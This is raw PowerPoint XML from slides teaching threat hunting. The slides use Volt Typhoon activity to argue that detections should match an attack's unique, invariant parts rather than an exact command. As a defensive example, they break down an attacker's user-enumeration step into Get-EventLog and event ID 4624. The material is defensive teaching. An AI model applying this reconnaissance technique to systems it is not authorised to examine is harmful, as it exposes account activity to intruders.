        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1828691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32322-B78A-A04D-0D39-D859467CFC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22A4A-2018-43DD-1000-A1E2ADEB7133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Example activity from Volt Typhoon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE28731-EA9C-CB3A-9714-0FF7C1EF4C2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472963" y="2060092"/>
            <a:ext cx="9246073" cy="2737816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3981592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2F504E2-64DF-B495-2BB8-D91EFA6C16D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51F34EC-0CA9-FBF5-5B49-0D2F60E04B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314824" y="735106"/>
            <a:ext cx="10053763" cy="2928470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How do we hunt for this well?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C78DC6E-2EB5-447F-EBDF-33E559BE0179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350682" y="4870824"/>
            <a:ext cx="10005951" cy="1458258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Looking for what is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1"/>
              <a:t>unique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1"/>
              <a:t>invariant</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3303307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AB4A8A2-17F4-BEBA-1EA2-D4EB4D57CD4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314824" y="735106"/>
            <a:ext cx="10053763" cy="2928470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is threat hunting?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FC28DC7-C5D2-4377-5821-5A2E408A6395}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350682" y="4870824"/>
            <a:ext cx="10005951" cy="1458258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Manually looking for threats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="750787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51505-DD9A-3047-9381-10E2CEBE54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820B1-B377-831D-256D-9DC7FDD392BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Bad “naïve” approach:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D3EC4C-AEE7-7F27-215A-2E2BA17BE517}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2490833"/>
            <a:ext cx="10515600" cy="4002042"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Highly inflexible, must be an exact match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Won’t get any false positives! But at what cost?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Doesn’t account for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Double spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Reordering of arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>This is easily fixed using the proper KQL operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Crucially, doesn’t account for more or fewer arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>What if the command isn’t run with all these arguments, or has more?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>We want to match what is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>unique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> to the malicious activity, but we must make sure it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>invariant</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E0EEAD-FA36-B5D7-7BE4-AF20F245890C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="9168100" cy="530271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260765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711F30-234C-7452-6C8D-36D72B04FEE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B6D70B-1A0B-AEEC-C12C-33161E6E8970}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386865" y="818984"/>
            <a:ext cx="6596245" cy="3268520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evidence in threat reports is just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4800" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">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B1FAD51C-A87E-6D0E-E239-0D1A7EC620B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1931874" y="4797188"/>
            <a:ext cx="6051236" cy="1241828"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-AU">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We need to look for the parts that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invariant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for the activity we’re worried about</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">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0437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E72F9-C915-73E5-6C62-808E27B07C14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>What are the invariants in this activity?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B5BD98F-9875-1CBC-147F-73BCDF55CDE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="4133196"/>
            <a:ext cx="10515600" cy="2500280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Objective of the command? Enumerate users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>This is achieved by retrieving event logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>EventLog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> is therefore mandatory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>These logs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> have ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>4624</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Setting the -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>instanceid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> argument to 4624 is therefore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>mandatory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>-after just affects the date, so requiring it in our query is a mistake!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CED6640-2F17-0FCB-0F13-0BE3713CC205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472963" y="1311560"/>
            <a:ext cx="9246073" cy="2737816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1777724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8CD96-C2BB-3054-7CAC-1B7FF33AA0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B5921F-7F25-9C64-325A-EB807D232935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>What are the invariants in this activity?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{628F7242-A2A4-1FD2-E50F-F5B12E7ED64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="4133196"/>
            <a:ext cx="10515600" cy="2500280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Objective of the command? Enumerate users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>This is achieved by retrieving event logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>EventLog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> is therefore mandatory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>These logs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> have ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>4624</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Setting the -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>instanceid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> argument to 4624 is therefore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>mandatory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>-after just affects the date, so requiring it in our query is a mistake!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17CAD011-B0B6-E2FC-BC9F-15193AF5AEE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472963" y="1311560"/>
            <a:ext cx="9246073" cy="2737816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70FED596-D78D-0762-0449-B40C652CAE37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583009" y="2180917"/>
            <a:ext cx="1412003" cy="451069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1412003"/>
              <a:gd name="connsiteY0" fmla="*/ 225535 h 451069"/>
              <a:gd name="connsiteX1" fmla="*/ 706002 w 1412003"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 451069"/>
              <a:gd name="connsiteX2" fmla="*/ 1412004 w 1412003"/>
              <a:gd name="connsiteY2" fmla="*/ 225535 h 451069"/>
              <a:gd name="connsiteX3" fmla="*/ 706002 w 1412003"/>
              <a:gd name="connsiteY3" fmla="*/ 451070 h 451069"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1412003"/>
              <a:gd name="connsiteY4" fmla="*/ 225535 h 45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003" h="451069" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="225535"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-42737" y="74614"/>
                  <a:pt x="308810" y="2732"/>
                  <a:pt x="706002" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1110234" y="3014"/>
                  <a:pt x="1386124" y="101798"/>
                  <a:pt x="1412004" y="225535"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1395344" y="366365"/>
                  <a:pt x="1084933" y="511776"/>
                  <a:pt x="706002" y="451070"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="307015" y="446106"/>
                  <a:pt x="12325" y="355984"/>
                  <a:pt x="0" y="225535"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78BD6BAD-1730-2596-634D-8D3AB644FDF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614365" y="2172880"/>
            <a:ext cx="1687100" cy="451069"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1687100"/>
              <a:gd name="connsiteY0" fmla="*/ 225535 h 451069"/>
              <a:gd name="connsiteX1" fmla="*/ 843550 w 1687100"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 451069"/>
              <a:gd name="connsiteX2" fmla="*/ 1687100 w 1687100"/>
              <a:gd name="connsiteY2" fmla="*/ 225535 h 451069"/>
              <a:gd name="connsiteX3" fmla="*/ 843550 w 1687100"/>
              <a:gd name="connsiteY3" fmla="*/ 451070 h 451069"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1687100"/>
              <a:gd name="connsiteY4" fmla="*/ 225535 h 45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100" h="451069" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="225535"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-43367" y="74225"/>
                  <a:pt x="290089" y="32870"/>
                  <a:pt x="843550" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1323748" y="3014"/>
                  <a:pt x="1661220" y="101798"/>
                  <a:pt x="1687100" y="225535"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1631724" y="404172"/>
                  <a:pt x="1293664" y="538212"/>
                  <a:pt x="843550" y="451070"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="368597" y="446106"/>
                  <a:pt x="12325" y="355984"/>
                  <a:pt x="0" y="225535"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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56714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D9102A5-B6DF-9964-7129-AF40C1CAF26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D97449B-899D-8E88-9A6F-1A8678C10948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="826396" y="586855"/>
            <a:ext cx="4230100" cy="3387497"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is just this enough?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1130EF67-4EE1-C286-0E27-36AE93B6B39A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6503158" y="649480"/>
            <a:ext cx="4862447" cy="5546047"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Our invariants are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>EventLog</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
